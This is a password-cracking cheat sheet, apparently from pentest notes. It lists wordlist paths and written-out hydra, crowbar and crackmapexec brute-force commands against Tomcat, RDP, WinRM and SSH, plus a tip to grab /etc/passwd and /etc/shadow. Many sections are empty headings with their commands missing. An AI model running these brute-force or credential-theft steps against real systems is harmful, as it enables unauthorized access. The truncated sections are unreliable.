Password Cracking

Wordlist

/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/others/names.txt

Bruteforce

Tomcat GET

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<Target IP Address>:8080/manager/html

RDP

crowbar -b rdp -s <Target IP Address> -u <Username> -C /usr/share/wordlists/rockyou.txt -n 1

Evil-WinRM

crackmapexec winrm <Target IP Address> -d <Domain Name> -u <Username Listt> -p <Password List>

SSH

hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<Target IP Address> -s <Port>
hydra -l <Username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <Target IP Address> ssh -t 4 -V

HTTP-GET

HTTP-POST

FTP

ZIP

WordPress

ASC

1

Store the hash of ASC file

2

Crack the hash

3

Import the ASC

4

Enter the passphrase from john

5

Decrypt PGP file

Hash Crack

Hash Finder

NOTE: For the above command, paste the hash after entering that

Hashcat

John The Ripper

  • Linux

1

Combine both shadow and password

NOTE: Grab both /etc/passwd and /etc/shadow

2

Crack the hash

  • Windows

PDF

ZIP

SAM & SYSTEM

Keepass Database

SSH

Last updated